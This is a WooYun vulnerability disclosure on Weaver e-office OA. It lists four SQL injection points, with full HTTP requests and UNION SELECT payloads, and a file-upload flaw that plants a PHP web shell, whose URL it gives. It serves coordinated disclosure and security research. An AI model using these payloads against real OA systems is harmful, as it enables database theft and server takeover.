当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-076191

漏洞标题:泛微OA漏洞集合·2(SQL注入/文件上传getshell)

相关厂商:泛微OA

漏洞作者: 路人甲

提交时间:2014-09-17 12:37

修复时间:2014-12-16 12:38

公开时间:2014-12-16 12:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-09-17: 细节已通知厂商并且等待厂商处理中
2014-09-22: 厂商已经确认,细节仅向厂商公开
2014-09-25: 细节向第三方安全合作伙伴开放
2014-11-16: 细节向核心白帽子及相关领域专家公开
2014-11-26: 细节向普通白帽子公开
2014-12-06: 细节向实习白帽子公开
2014-12-16: 细节向公众公开

简要描述:

...泛微系统办公高级版

详细说明:

:::::只为系统更安全:::::因问题较多,只拿官方demo演示:::::

QQ图片20140916012441.jpg


0x01:SQL注入漏洞 4 处


1# 注入点一

POST /general/new_mytable/content_list/content_-99.php?user_id=WV00000045&lang=cn HTTP/1.1
Host: eoffice8.weaver.cn:8028
Proxy-Connection: keep-alive
Content-Length: 40
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.6.0_rc0
Origin: http://eoffice8.weaver.cn:8028
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://eoffice8.weaver.cn:8028/general/new_mytable/newportal.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: LOGIN_LANG=cn; PHPSESSID=a404fce9850b7c8c0272b077efc44820; USER_NAME_COOKIE=xj; LOGIN_LANG=cn
block_id=1901&body_width=1121&_=
问题参数 block_id


QQ图片20140916010053.jpg


2# 注入点二

http://eoffice8.weaver.cn:8028/general/address/view/view_detail.php?ADD_ID=-169%20UNION%20SELECT%201,2,3,4,5,6,version(),8,9,database(),user(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46


QQ图片20140916010726.jpg


3# 注入点三

http://eoffice8.weaver.cn:8028/general/address/docenter/export_do.php?group_id=19%20UNION%20SELECT%20user(),database(),version(),4,5,6,7,8,9,10,11,12,13,14,15,16
这个注入点比较有意思,导出的通讯录中会有相关的数据库信息


QQ图片20140916010843.jpg


4# 注入点四

GET /general/file_folder/file_new/neworedit/getContentByType.php?type=1&content_id=319*&SORT_ID=148&FILE_SORT=1 HTTP/1.1
Host: eoffice8.weaver.cn:8028
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36
Referer: http://eoffice8.weaver.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=319&SORT_ID=148&func_id=&operationType=editFromRead&docStr=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2
Cookie: LOGIN_LANG=cn; PHPSESSID=a404fce9850b7c8c0272b077efc44820; USER_NAME_COOKIE=xj; LOGIN_LANG=cn
问题参数为 content_id


QQ图片20140916011054.jpg


0x02:文件上传导致Getshell


办理流程 -- 费用报销 -- 签办反馈
http://eoffice8.weaver.cn:8028/general/workflow/input_form/input_form.php?RUN_ID=5557&FLOW_ID=3115&PRCS_ID=1&FLOW_PRCS=1&FUNC_ID=
在“签办反馈”处可以上传文件(cvs --> php),最终可 getshell

QQ图片20140916011741.jpg


QQ图片20140916011646.jpg


QQ图片20140916011703.jpg


最终得到shell:http://eoffice8.weaver.cn:8028/ATTACHMENT/1952281003/conf1g.php

QQ图片20140916012332.jpg


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-22 09:45

厂商回复:

最新状态:

暂无

漏洞评价:

评论

  1. 2014-09-17 13:46 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    高级版有什么区别?

  2. 2014-12-16 13:17 | U神 ( 核心白帽子 | Rank:1285 漏洞数:142 | 感谢乌云,知恩不忘,其实我一直都在乌云默...)

    关键是这个要登陆就没意思了

  3. 2014-12-16 16:13 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    为何我们用的是jsp

  4. 2014-12-16 16:14 | Coody 认证白帽子 ( 核心白帽子 | Rank:1565 漏洞数:189 | 不接单、不黑产;如遇接单收徒、绝非本人所...)

    @浮萍 是另一套程序吧?

  5. 2014-12-16 16:28 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    @Coody e-Weaver 应该吧~~